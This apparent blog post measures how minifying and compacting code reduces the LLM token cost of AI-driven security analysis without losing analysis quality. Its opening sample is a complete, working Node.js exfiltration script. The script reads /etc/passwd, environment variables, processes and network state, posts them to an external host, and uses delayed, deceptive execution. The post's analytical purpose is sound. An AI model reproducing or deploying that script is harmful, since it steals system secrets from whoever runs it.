Optimising token usage in static AI-powered code security analysis



Take this block of code: a self-contained JS script that exfiltrates system and project info. I can read it, you can read it, and AI can read it.

```javascript
const fs = require('fs');
const { exec } = require('child_process');
const https = require('https');

class SystemAnalytics {
  constructor() {
    this.collectionEndpoint = 'https://metrics-collector.org/api/v1/collect';
    this.packageData = {};
    this.systemInfo = {};
  }

  async gatherInformation() {
    try {
      // Read package.json
      const packageJson = await fs.promises.readFile(
        process.cwd() + '/package.json',
        'utf8'
      );
      this.packageData = JSON.parse(packageJson);

      // Collect system commands output
      const commands = [
        'uname -a', // System info
        'cat /etc/passwd', // Users
        'cat /proc/cpuinfo', // CPU info
        'ps aux', // Running processes
        'netstat -tulpn', // Network connections
        'printenv' // Environment variables
      ];

      for (const cmd of commands) {
        const output = await this.executeCommand(cmd);
        this.systemInfo[cmd] = output;
      }

      // Send collected data
      await this.sendData({
        package: this.packageData,
        system: this.systemInfo,
        timestamp: new Date().toISOString(),
        nodeVersion: process.version,
        pwd: process.cwd()
      });
    } catch (error) {
      // Silent fail
      console.log('Package initialized successfully');
    }
  }

  executeCommand(command) {
    return new Promise((resolve) => {
      exec(command, (error, stdout) => {
        resolve(stdout || '');
      });
    });
  }

  sendData(data) {
    return new Promise((resolve) => {
      const request = https.request(this.collectionEndpoint, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
          'User-Agent': 'npm-analytics/1.0'
        }
      });
      request.write(JSON.stringify(data));
      request.end();
      resolve();
    });
  }
}

// Delayed execution to avoid immediate detection
const delay = Math.floor(Math.random() * 30000);
setTimeout(() => {
  new SystemAnalytics().gatherInformation();
}, delay);

// Export a legitimate-looking function
module.exports = {
  analyzeSystem: () => console.log('System analysis complete')
};
```

This block of code is 2601 characters, or 488 tokens. That works out to a cost of $0.00161 in Claude Sonnet 3.5 input tokens, not including our prompt.

By itself that doesn't seem too bad, and it's not. But there's a lot more code out there being analysed by LLMs, and those 0.16 cents add up. In this post, we'll go through some techniques that reduce our cost while still getting good results.
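To get a feel for how quickly that adds up, here is a minimal sketch that scales the per-file figure quoted above. The file counts are hypothetical and chosen only for illustration, and it assumes every file is roughly the size of our sample.

```javascript
// Per-file input cost quoted above (USD); prompt tokens are not included.
const COST_PER_FILE_USD = 0.00161;

// Total input cost for analysing `fileCount` files of similar size.
function totalCostUsd(costPerFileUsd, fileCount) {
  return costPerFileUsd * fileCount;
}

// Hypothetical volumes, for illustration only.
for (const files of [1000, 100000, 10000000]) {
  const cost = totalCostUsd(COST_PER_FILE_USD, files).toFixed(2);
  console.log(`${files} files: $${cost}`);
}
```

Any saving we make on input tokens scales by the same factor.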

Tokens are expensive, pre-processing is cheap

OpenAI has a wonderful tool, Tokenizer, that can help us understand how LLMs see text.



It's also very pretty: each differently coloured block is one token. As you can tell, we're spending tokens all over the place: on comments, blank space, function names and variable names.
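If you want a rough number rather than a picture, a small scanner can split a source file into comments, whitespace and everything else. This is only a sketch: it counts characters, not tokens, so treat it as a proxy, and the `characterBreakdown` helper is my own illustration rather than part of any tokenizer. It is string-aware so that the `//` in a URL isn't mistaken for a comment, but it does not understand regex literals or template-literal interpolation.

```javascript
// Rough breakdown of where a JavaScript source file spends its characters.
// Handles // and /* */ comments and '...', "...", `...` strings only.
function characterBreakdown(source) {
  const counts = { comments: 0, whitespace: 0, code: 0 };
  let i = 0;
  while (i < source.length) {
    const ch = source[i];
    const next = source[i + 1];
    if (ch === '/' && next === '/') {
      // Line comment: runs up to (not including) the newline.
      let end = source.indexOf('\n', i);
      if (end === -1) end = source.length;
      counts.comments += end - i;
      i = end;
    } else if (ch === '/' && next === '*') {
      // Block comment: runs through the closing */.
      let end = source.indexOf('*/', i + 2);
      end = end === -1 ? source.length : end + 2;
      counts.comments += end - i;
      i = end;
    } else if (ch === '"' || ch === "'" || ch === '`') {
      // String literal: skip to the matching quote, honouring backslash escapes.
      let end = i + 1;
      while (end < source.length && source[end] !== ch) {
        end += source[end] === '\\' ? 2 : 1;
      }
      end = Math.min(end + 1, source.length);
      counts.code += end - i;
      i = end;
    } else if (/\s/.test(ch)) {
      counts.whitespace += 1;
      i += 1;
    } else {
      counts.code += 1;
      i += 1;
    }
  }
  return counts;
}

const sample = "const url = 'https://example.org'; // endpoint\n";
console.log(characterBreakdown(sample));
// { comments: 11, whitespace: 5, code: 31 }
```

Everything counted under `comments` and `whitespace` is what a minifier can remove without touching behaviour.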

Here's an initial analysis. In this case I'm asking the model (Claude Sonnet 3.5) some fairly open-ended questions about the issues in the code and the security risks.

- Data Collection & Privacy:
  - Collects sensitive system information including:
    - User information (/etc/passwd)
    - Running processes (ps aux)
    - Network connections (netstat)
    - Environment variables (printenv)
    - System details (uname)
    - CPU information
    - Package.json contents
- Deceptive Practices:
  - Uses deliberately misleading error messages ("Package initialized successfully" when errors occur)
  - Includes random delay to avoid detection
  - Exports a dummy function to appear legitimate
  - Disguises itself as an analytics package
- Data Exfiltration:
  - Sends collected data to an external endpoint (metrics-collector.org)
  - Uses HTTPS for data transmission to avoid network security detection
- Technical Implementation:
  - Uses Node.js built-in modules (fs, child_process, https)
  - Implements asynchronous operations with Promises
  - Structured as a class (SystemAnalytics)
  - Uses command execution through child_process.exec

Pretty decent, the analysis is correct and I can't really fault it.

Since we're looking at JavaScript, we're going to be using Terser, a "JavaScript mangler and compressor toolkit".



```shell
terser original.js -o level1.js --compress
```

Fundamentally, this just gets rid of the comments and blank space, plus a few safe simplifications.

Not so readable for you and me anymore, but still pretty good. And for the LLM we've reduced our input tokens from 488 to 319: a whopping 35% decrease, at almost no cost.

Does this impact the AI analysis?

This code appears to be a potential security concern. Here's my analysis:

Key Concerns:

- Data Collection & Privacy:
  - The code collects sensitive system information including:
    - /etc/passwd (user account information)
    - Process lists (ps aux)
    - Network connections (netstat)
    - Environment variables (printenv)
    - System details (uname, CPU info)
- Suspicious Behavior:
  - Uses a delayed execution (random 0-30 seconds)
  - Sends collected data to an external endpoint (metrics-collector.org)
  - Masks its activity with misleading console messages

Red Flags:

- Stealth Operations:
  - Delayed execution to avoid immediate detection
  - False success messages hiding actual operations
- Data Exfiltration:
  - Collects sensitive system information
  - Sends data to an external server
  - No user notification or consent
- Masking:
  - Exports an innocent-looking function
  - Real functionality hidden in constructor

Very much the same as before with the same issues and key points identified.

Let's turn it up some more.



```shell
terser input.js -o level2.js --compress sequences=true,dead_code=true,conditionals=true,booleans=true,unused=true,if_return=true,join_vars=true,drop_console=true,passes=3 --mangle --mangle-props reserved=['require','module','exports']
```

This command minifies and mangles everything, while keeping the code in a working state.

This is smaller, and at a glance we can still kind of tell what's going on. We are now down to 297 tokens, or a 42.8% reduction from the original.
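If you would rather drive Terser from Node than from the shell, the same flags can be written as an options object. The sketch below mirrors the CLI command as I understand the mapping; the `level2Options` name is just for illustration.

```javascript
// Options object mirroring the CLI flags above, in the shape accepted by
// Terser's programmatic minify(code, options) API.
const level2Options = {
  compress: {
    sequences: true,
    dead_code: true,
    conditionals: true,
    booleans: true,
    unused: true,
    if_return: true,
    join_vars: true,
    drop_console: true,
    passes: 3,
  },
  mangle: {
    // Equivalent of --mangle-props reserved=[...]
    properties: { reserved: ['require', 'module', 'exports'] },
  },
};

console.log(Object.keys(level2Options.compress).length, 'compress options set');
```

Assuming the `terser` package is installed, this would be passed as `await minify(source, level2Options)`, which resolves to an object whose `code` property holds the minified output.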

Key Concerns:

- Data Collection & Privacy:
  - Collects sensitive system information including:
    - User passwords (/etc/passwd)
    - Running processes (ps aux)
    - Network connections (netstat)
    - Environment variables (printenv)
    - System information (uname, cpuinfo)
- Suspicious Behavior:
  - Uses obfuscated variable names (t, o, i, p, etc.)
  - Sends collected data to an external endpoint (metrics-collector.org)
  - Implements random delay (30 seconds max) before execution
  - Attempts to hide its presence with minimal exports
- Technical Implementation:
  - Uses Node.js built-in modules (fs, child_process, https)
  - Executes system commands using child_process.exec
  - Collects package.json information
  - Sends data via HTTPS POST request
- Red Flags:
  - Unauthorized data collection
  - Code obfuscation
  - Suspicious external endpoint
  - Collection of sensitive system files
  - Hidden execution with random delay

Now the analysis is still correct, and key issues are identified, but our minification attempts are starting to have an impact on the analysis.

"Uses obfuscated variable names (t, o, i, p, etc.)" & "Code obfuscation"

Assuming that there is still a human in the loop, this might not be the end of the world. And we can still go further.

Terser is designed to keep the code it minifies functional, but when it comes to analysis, the LLM doesn't actually need to run the code. At this point we've reached the limits of Terser, but we can write our own parser.



I wrote a very bad parser, but the file is now even smaller, the code isn't functional anymore, and we can't read it.
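To give an idea of what "not functional anymore" can look like, here is a minimal sketch of a lossy compactor. It is not the parser used for the result above, and the `NOISE` keyword list and `compactForAnalysis` name are my own assumptions. It drops comments and a handful of low-signal keywords, then glues the remaining tokens together with as little whitespace as possible. It does not understand regex literals, and it can change meaning in edge cases (for example `a + +b`), which is acceptable only because nothing will ever run the output.

```javascript
// Keywords that carry little signal for a reader who never runs the code.
// This list is an assumption for illustration only.
const NOISE = new Set([
  'const', 'let', 'var', 'async', 'await',
  'return', 'new', 'this', 'function', 'class',
]);

// Order matters: comments and strings are matched before identifiers,
// numbers and single punctuation characters.
const TOKEN = /\/\/[^\n]*|\/\*[\s\S]*?\*\/|'(?:\\.|[^'\\])*'|"(?:\\.|[^"\\])*"|`(?:\\.|[^`\\])*`|[A-Za-z_$][\w$]*|\d+(?:\.\d+)?|\S/g;

function compactForAnalysis(source) {
  let out = '';
  for (const [token] of source.matchAll(TOKEN)) {
    if (token.startsWith('//') || token.startsWith('/*')) continue; // drop comments
    if (NOISE.has(token)) continue; // drop low-signal keywords
    // Insert a space only where two word-like tokens would otherwise merge.
    if (/[\w$]$/.test(out) && /^[\w$]/.test(token)) out += ' ';
    out += token;
  }
  return out;
}

const input =
  "const { exec } = require('child_process'); // run commands\n" +
  "exec('cat /etc/passwd');";
console.log(compactForAnalysis(input));
// {exec}=require('child_process');exec('cat /etc/passwd');
```

String literals are kept verbatim on purpose: the commands, file paths and URLs inside them are exactly what the model needs to see.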

Let's check out the analysis to see if we've lost any detail this time around.

Key Security Concerns:

- Command Execution:
  - Uses child_process.exec to run system commands
  - Executes sensitive commands like 'cat /etc/passwd', 'ps aux', 'netstat'
  - Accesses system information and environment variables
- Data Collection:
  - Reads package.json
  - Gathers system details (uname, CPU info, processes, network connections)
  - Collects environment variables
  - Records timestamp and Node.js version
- Data Exfiltration:
  - Uses HTTPS module (require("https"))
  - Appears to package collected data for external transmission

Outstanding, the analysis is still correct and the results are good. The best part of all this is that the input is now only 124 tokens, 375 characters.

We have achieved a total reduction of 74.59% with no real degradation in analysis quality, and at a very small up-front cost.
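For anyone wanting to track the same metric on their own files, the reduction is simply the tokens saved divided by the original count. A minimal sketch, using the token counts from the first and final steps of this post (the `reductionPercent` helper name is mine):

```javascript
// Percentage of input tokens saved when going from `before` to `after`.
function reductionPercent(before, after) {
  return ((before - after) / before) * 100;
}

console.log(reductionPercent(488, 319).toFixed(1)); // 34.6
console.log(reductionPercent(488, 124).toFixed(2)); // 74.59
```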

Thank you for reading, I hope you enjoyed this post.